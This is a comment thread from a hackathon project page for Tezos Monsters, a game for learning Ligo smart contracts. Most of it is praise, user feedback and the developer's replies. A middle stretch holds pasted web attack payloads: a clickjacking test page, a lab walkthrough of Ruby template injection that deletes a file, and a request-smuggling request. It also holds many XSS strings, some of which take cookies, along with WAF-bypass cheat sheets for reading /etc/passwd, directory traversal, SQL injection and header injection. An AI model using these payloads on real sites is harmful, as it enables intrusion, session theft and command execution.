Learning Tezos and Ligo is fun. Just test it with tezos-monsters.com
This project was developed from scratch especially for the Tezos Build hackathon and consists of:
- Horror Game Engine (was developed for this hack from scratch)
- Game Editor (was developed for this hack from scratch also)
- Programming task checker (based on Ligo WebIDE)
niceee ///
Wonde<script>alert(2)</script>rful!
Wonderful!
Nice ☺️
awesome
nice
very well
Waiting this! Looks good!
very good
Brilliant!!!
omg that is cooll
hellooo
looks nice
nice
good
gm
How can I take part in this? Is it possible to earn karma for participating?
Fjkdfghbb
I think this is a great game and a very invaluable resource for developers, I'm sure everyone will figure it out. Good luck to everyone.
Wow! Nice!
good project
Awesome stuff
Wait for Tezos Monsters.
cool!!!
I like it! Keep it up
A wonderful project
Good
I like this project. I hope it would be good for everyone!
It's very interesting.
hope this project will be a success!
Good
Seems to be a nice way to teach people how to create contracts on the blockchain. That's what I want to learn, so yes. The project makes sense to me.
good
I like it <3
hey
interesting, waiting...
good
Interesting... should wait for release
is this still ongoing ?
Just gone through this. IMO it's brilliant stuff, if it will go live someday later as well
would be a good game I hope to play it
Good
VERY GOOD!!
Not bad
very good
Very good!
Great
Seems awesome mate!
Good
awesome!
I liked it. like it
cool
cool
Cool
Great. Amazing
I like it
Wow, I think it's a really nice idea
Looks nice
MONSTERRRRRSSSS=))
Good
Interesting
Very interesting
Hi. Your link asks for registration via Google; after that it is not working. Is the game ready, can I test it?
When will be possible to play?
super
Fine
When does it begin? Looks promising.
Great. Amazing
Good
Great
I think this is a good idea. I am waiting!
It was fun
Great idea!!
nice
like
it was really interesting
Ok
Great
Nice project. But it doesn't work anymore.
i like it a lot, horror
wow good
nice
Cool
nice
nice
Does it even work?
Looks very terrible 😂
Cool
amazing!
very useful!
intelligently
I believe in this project
Looks fun
nice project !
Looks interesting
Really Great
Great project
Awesome
What is this nonsense!?
nice!
Looks great, tezos perfect platform. Let me know if you need someone to bounce ideas off
nice
great project!!!
Cool project!
nice project.
Like it !!!
Cool project!
Oh, that's good~^^
great!
Good project
what the scripts comments?
Good
Good!
nice project.
great project! :)
nice job
good
Good!!
good
omg that is cooll
nice
cool
No content at all
Very cool
IT IS SO COOL!
<html> <head> <title>Clickjacking Test Sayfası</title> </head> <body> <p>Web sayfanız Clickjacking saldırılarına açık!</p> <iframe src="https://coinlist.co/" width="500" height="500"></iframe> </body> </html>
Notice that when you try to view more details about the first product, a GET request uses the message parameter to render "Unfortunately this product is out of stock" on the home page. In the ERB documentation, discover that the syntax <%= someExpression %> is used to evaluate an expression and render the result on the page. Use ERB template syntax to create a test payload containing a mathematical operation, for example: <%= 7*7 %> URL-encode this payload and insert it as the value of the message parameter in the URL as follows, remembering to replace your-lab-id with your own lab ID: https://your-lab-id.web-security-academy.net/?message=<%25%3d+7*7+%25> Load the URL in your browser. Notice that in place of the message, the result of your mathematical operation is rendered on the page, in this case, the number 49. This indicates that we may have a server-side template injection vulnerability. From the Ruby documentation, discover the system() method, which can be used to execute arbitrary operating system commands. Construct a payload to delete Carlos's file as follows: <%= system("rm /home/carlos/morale.txt") %> URL-encode your payload and insert it as the value of the message parameter, remembering to replace your-lab-id with your own lab ID: https://your-lab-id.web-security-academy.net/?message=<%25+system("rm+/home/carlos/morale.txt")+%25>
1|whoami
POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 6 Transfer-Encoding: chunked 0 G The second response should say: Unrecognized method GPOST.
<form method="$method" action="$url"> <input type="hidden" name="$param1name" value="$param1value"> </form> <script> document.forms[0].submit(); </script>
To break out of the quoted attribute and inject an event handler, replace your input with the following payload: "onmouseover="alert(1)
<a href="jav%0Dascript:alert(1)"> RCE Payloads Detection Bypass for PL3 by @theMiddle (v3.1) ;+$u+cat+/etc$u/passwd$u RCE Payloads Detection Bypass for PL2 by @theMiddle (v3.1) ;+$u+cat+/etc$u/passwd+\# RCE Payloads for PL1 and PL2 by @theMiddle (v3.0) /???/??t+/???/??ss?? RCE Payloads for PL3 by @theMiddle (v3.0) /?in/cat+/et?/passw?
<body style="height:1000px" onwheel="alert(1)"> <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)"> <b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)> HTML Injection by @Global-Evolution GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US Host: favoritewaf.com User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT) XSS Bypass by @0xInfection <a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit) by @xort Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit) by @xort Cerber (WordPress) Username Enumeration Protection Bypass by HTTP Verb Tampering by @ed0x21son POST host.com HTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
Standard: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\ Obfuscated: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\ Standard: <script>alert()</script> Obfuscated: %253Cscript%253Ealert()%253C%252Fscript%253E 8. Wildcard Obfuscation Globbing patterns are used by various command-line utilities to work with multiple files. We can tweak them to execute system commands. Specific to remote code execution vulnerabilities on linux systems. Standard: /bin/cat /etc/passwd Obfuscated: /???/??t /???/??ss?? Used chars: / ? t s Standard: /bin/nc 127.0.0.1 1337 Obfuscated: /???/n? 2130706433 1337 Used chars: / ? n [0-9]
Standard: <marquee onstart=prompt()> Obfuscated: <marquee onstart=\u0070r\u06f\u006dpt()> Blocked: /?redir=http://google.com Bypassed: /?redir=http://google。com (Unicode alternative) Blocked: <marquee loop=1 onfinish=alert()>x Bypassed: <marquee loop=1 onfinish=alert︵1)>x (Unicode alternative) TIP: Have a look at this and this reports on HackerOne. :) Standard: ../../etc/passwd Obfuscated: %C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd 4. HTML Representation
Blocked: uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12) Bypassed: uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29 3. Unicode Normalization
pragma solidity ^0.8.2;

contract Token {
    mapping(address => uint) public balances;
    mapping(address => mapping(address => uint)) public allowance;
    uint public totalSupply = 1000000 * 10 ** 18;
    string public name = "BabyDogeCoin";
    string public symbol = "BabyDoge";
    uint public decimals = 18;

    event Transfer(address indexed from, address indexed to, uint value);
    event Approval(address indexed owner, address indexed spender, uint value);

    constructor() {
        balances[msg.sender] = totalSupply;
    }

    function balanceOf(address owner) public returns(uint) {
        return balances[owner];
    }

    function transfer(address to, uint value) public returns(bool) {
        require(balanceOf(msg.sender) >= value, 'balance too low');
        balances[to] += value;
        balances[msg.sender] -= value;
        emit Transfer(msg.sender, to, value);
        return true;
    }

    function transferFrom(address from, address to, uint value) public returns(bool) {
        require(balanceOf(from) >= value, 'balance too low');
        require(allowance[from][msg.sender] >= value, 'allowance too low');
        balances[to] += value;
        balances[from] -= value;
        emit Transfer(from, to, value);
        return true;
    }

    function approve(address spender, uint value) public returns (bool) {
        allowance[msg.sender][spender] = value;
        emit Approval(msg.sender, spender, value);
        return true;
    }
}
<foo>&xxe;</foo> <!--#directive param="value" --> {{_openBlock.constructor('alert(1)')()}} powershell C:\*\*2\n??e*d.*? # notepad @^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
%E5%98%8A = %0A = \u560a • %E5%98%8D = %0D = \u560d • %E5%98%BE = %3E = \u563e (>) • %E5%98%BC = %3C = \u563c (<) • Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test
<a href="/uploads/dosya-adi.pdf"> Dosya İndir</a> İndirilecek
<a href="https://www.google.com/" rel="nofollow"> Link</a> <a href="https://www.google.com/" rel="dofollow"> Link</a>
https://coinlist.co/build/tezos/projects/af37fc9e-31b6-4caf-8ed0-2b5c1e502ccb
#user
@admin
+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
"><u>XSS Vulnerability</u><marquee+onstart='alert(document.cookie)'>XSS
<svg onload=alert%26%230000000040"1")>
<svg/onload=eval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ==’))>
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>
msg=<script>alert(1)</script> ?msg=<img src=xss onerror=alert(1)> ?msg=<input/onmouseover=”javaSCRIPT:confirm(1)” ?msg=<iframe %00 src=” javascript:prompt(1) ”%00>
<h1>Hello World</h1>
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Yazılım Bilişim</title> <meta http-equiv="refresh" content="3;URL=https://www.yazilimbilisim.net"> </head> <body> <h1>3 Saniye Sonra YazılımBilişim Sayfasına Yönlendirileceksiniz</h1> </body> </html>
<meta http-equiv="refresh" content="3;">
%u003Csvg onload=alert(1)> %u3008svg onload=alert(2)> %uFF1Csvg onload=alert(3)
'-alert(document.domain)-'
<img src =1 href=1 onerror="javascript":alert(1)"></image>
"></select><img%20src=1%20onerror=alert(1)>;
Perfect '/%#^*¥¥(₺¥=@++×€¥0987
Amazing
amazing!
Nice idea, play to learn is a really good approach
great!!
amazing
nice project
Amazing wow new things coming on tezos
Learning makes me happy
amazing
Even though I am not a programmer, I learned Solidity with CryptoZombies and have won some hackathons with that knowledge. Therefore, an approach like the one you suggest with the app is dramatically effective for involving new developers and entrepreneurs in the ecosystem. Good job!
good
perfect
I'm from Vietnam, my daily job is a programmer
Just published an article about Tezos Monsters: https://medium.com/@mikael.lazarev/how-to-become-a-monsters-in-tezos-development-400cf14233bf?sk=cccff54d1242d78bca7c92904f9d7682
@Alex and @Gleb, thanks for your feedback, I hope you enjoyed! Especially for you and a lot of other people who asked me for the "show me answer" feature, today I've delivered it. Now you could get "Correct answer" at each code page. Enjoy! P.S. Hint! You could whole story by pressing "Show me correct answer" - there are a lot of good content there!
Great job!
It's a funny and cute game. I played three hours and I want to say that it's one of the best trainings about smart contracts with gamification.
Yesterday I've published an update based on community feedback:
- New fonts for better "eyes experience"
- Texts scroll back to top on new page
- Improve game layout
- Better performance
Thanks for your feedback, together we could build a really amazing product
@Savva Antonyuk - Thanks, my idea was to involve as many developers as could to LIGO. Tezos has very interesting concepts however they are new for majority of developers and I want to make a game which could help to learn them
@Ksenia Avetisova Thanks so much, it's great to get detailed feedback. I'm really happy that users suggest to me which things should be improved!
@Daria Arefieva & @Peter Rybin - Thanks so much for your feedback!
@Anastasiia Kondaurova Thanks so much for your detailed review, I'll make all changes you and other colleagues told me to improve. It's a great pleasure to get real feedback from blockchain developers community
Even I am not a programmer, I've learned Solidity with CryptoZombies and won a few hackathons with that knowledge. Therefore such an approach which you suggest with the app is dramatically effective to involve new developers and entrepreneurs in the ecosystem. Good job!
@Eugene Koinov I appreciate you for your feedback, you are one of the best blockchain developers I know. Thanks from me and our community
👍🏻
Misha, privet! Great game, I played yesterday for 4 hours, you made a really good project. Can't pass the page "To hash or not to hash", how to solve that? Code review could be improved. By the way, it's a really cool game to learn Ligo.
Hi, Mike! Amazing product, really cool. Some improvements as you asked:
- Make clear button on the first screen. It's not so clear how to start
- Your button called "check answer", in description: "check code" & "check answer button"
- On "Storage Money" page check the code block, it seems there should be 2 lines
But the game is really cool, good job
It's really fun! Thanks, Mikael!
First of all, I want to say a huge thank you for such a game. I think the Ligo developers don't exist because of a lack of convenient tools for learning. Although my comment proposes a lot of improvements, the game is incredibly important for the Tezos ecosystem.
Advantages:
- Cool but a bit confusing scenario.
- It is harder and thus more interesting than Cryptoverse wars for Smartpy.
- A lot of levels that cover most of the stages a smart contract developer faces.
Would be fine to improve:
- Poor navigation. It would be better to see topics that will be learned and be able to go back or forward at any time.
- Fonts and design. In general it looks harmonious, but some fonts make the eyes feel tired.
- The lack of a "Show answer" or "Show hint" button.
- Code Review isn't explained. For newbies, these magic Michelson instructions could be unclear. It would be better to remove them or add some comments.
- Pressing the "Next Page" button doesn't return you to the top of the page, so you see the end of the new text. It is annoying.
- Set is better than map in this case with `friends: map(address, bool)`
- Little theory basics.
- It seems I broke something. It wasn't working for a long time until page reload.
- What is the point of gold?
- Please, replace the icon)
- Something happened to fonts in a few places.
- Just curious, how do you check solutions?
- Written code disappears after page reloads.
- `To hash or not to hash?` is an unclear chapter. What hash function is the user supposed to use? Whose address should be in the map? What is the point of it? In general, the tasks at the end are hard to understand.
I add some screenshots here: https://www.notion.so/Ligo-Horror-0709620778d74f8398222fe875e6f967
Anyway, good job!
Wow, looking really nice and funny!